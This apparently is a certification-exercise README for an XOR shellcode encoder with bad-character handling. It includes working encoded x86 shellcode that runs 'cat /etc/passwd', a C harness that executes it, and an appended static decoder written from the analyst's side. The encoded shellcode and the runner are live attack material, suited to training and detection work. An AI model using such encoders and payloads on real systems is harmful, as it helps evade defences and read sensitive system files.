Student ID: SLAE-1530
This repository is part of the SLAE certification process from PentesterAcademy.com
This encoder uses XOR to encode your shellcode. It supports shellcode of any size and supports bad characters.
Even if bad characters support wasn't required to solve the challenge, I thought it would be something cool to learn and do.
-s : Shellcode to encode (Ex: \x31\xe2...\xeb).
-b : Bad chars list (Ex: \x0a\x0d), NULL is always a bad char.
-v : Enable verbose.
-j : Append junk opcode at the end of the original shellcode to vary its size.
-p : Check if final payload is really free of badchars (Paranoid mode).
We will use my cat /etc/passwd shellcode from the https://www.phrozen.io/docs/linux/slae32/ex2-reverseshell/ paper.
local@user:# ./xor-encoder.py -s "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x2f\x62\x89\xe3\x66\xb8\x2d\x63\x50\x31\xc0\x89\xe2\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x20\x2f\x65\x74\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe6\x50\x56\x52\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" -b "\x0a\x0d" -v -p
#include<stdio.h>
#include<string.h>
// Shellcode size = 173
unsigned char code[] = \
"\xeb\x1a\x5e\x31\xc9\x31\xc0\x31\xdb\xb1\x46\x8a\x24\x1e\x8a\x44"
"\x1e\x01\x30\xc4\x88\x26\x43\x46\xe2\xf1\xeb\x05\xe8\xe1\xff\xff"
"\xff\x14\x25\x79\xb9\x88\xd8\x56\x3e\x1e\x7c\x3e\x5f\xaf\xdc\xda"
"\xb2\xa5\xcd\x6d\x04\x60\x0e\x52\x7d\xb5\x9a\x8f\xe7\xbc\x93\xd2"
"\xfd\x4c\x63\x5c\x3e\x06\x8f\x1d\xfe\xf4\x92\x66\xde\xe8\xc5\xd3"
"\xb0\xff\xaf\x93\xa2\x62\xa2\x79\xf0\x82\x60\xa2\xf2\xfb\x93\x78"
"\x0b\x85\xf6\x26\x51\x5c\x38\xbb\xd3\x79\x1a\x4d\x62\x6a\x1a\xfa"
"\x9b\x58\x30\x9b\xbb\x92\xbd\xdb\xbe\x6f\x1b\x1e\x76\xe2\xcd\x3a"
"\x59\x09\x68\x58\x2c\xa0\xc8\x4e\x61\x81\xe3\x0f\x66\x10\x7e\xc0"
"\x49\x68\x8e\x21\x71\x26\x70\x47\x15\x2c\x7f\xcf\x46\x05\xe4\x11"
"\x41\x4b\xc2\x3a\xd8\x28\x98\x41\x4a\x6d\xa0\x16\x96";
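int main(void)
{
    // strlen() returns size_t, so print it with %zu
    printf("Shellcode Length: %zu\n", strlen((const char *)code));
    // Call the byte array as a function (needs the executable stack set by the gcc flags)
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}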
local@user:# gcc shellcode.c -o shellcode -z execstack && ./shellcode
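
Seen from the analyst's side, the XOR layer in this output can be removed statically, without running the payload. The following is an added example, not code from this repository: the 33-byte stub length, the loop-counter offset and the (encoded byte, key byte) pair layout are assumptions inferred from the bytes printed above, not read from xor-encoder.py.

```python
# Added example (not from the repository). Nothing here is executed as code:
# the encoder output printed above is treated as data and decoded statically.
ENCODED = bytes.fromhex(
    "eb1a5e31c931c031dbb1468a241e8a44"
    "1e0130c488264346e2f1eb05e8e1ffff"
    "ff142579b988d8563e1e7c3e5fafdcda"
    "b2a5cd6d04600e527db59a8fe7bc93d2"
    "fd4c635c3e068f1dfef49266dee8c5d3"
    "b0ffaf93a262a279f08260a2f2fb9378"
    "0b85f626515c38bbd3791a4d626a1afa"
    "9b58309bbb92bddbbe6f1b1e76e2cd3a"
    "590968582ca0c84e6181e30f66107ec0"
    "49688e2171267047152c7fcf4605e411"
    "414bc23ad82898414a6da01696"
)

# Layout inferred from the bytes above (assumption, not read from xor-encoder.py):
STUB_LEN = 33   # decoder stub, ends with call rel32 (e8 e1 ff ff ff)
COUNT_AT = 10   # imm8 of "mov cl, imm8" (b1 46): number of original bytes


def decode(blob: bytes) -> bytes:
    """Recover the original bytes from stub + (encoded, key) byte pairs."""
    if len(blob) <= STUB_LEN or blob[COUNT_AT - 1] != 0xB1:
        raise ValueError("unexpected stub layout")
    count = blob[COUNT_AT]
    pairs = blob[STUB_LEN:]
    if len(pairs) < 2 * count:
        raise ValueError("payload shorter than the stub's loop counter")
    # The stub XORs pair i (offsets 2i and 2i+1) and stores the result at i.
    return bytes(pairs[2 * i] ^ pairs[2 * i + 1] for i in range(count))


def bad_chars_present(blob: bytes, bad: bytes = b"\x0a\x0d") -> set:
    """Bytes from the bad-char list (NULL always included) found in blob."""
    return set(blob) & set(bad + b"\x00")


if __name__ == "__main__":
    original = decode(ENCODED)
    print(len(ENCODED), len(original), original.hex())
    print("bad chars in encoded payload:", bad_chars_present(ENCODED))
```

Because every original byte carries its own key byte, the encoded data has no repeating single-byte key to search for; the fixed stub prefix is the stable part to match on.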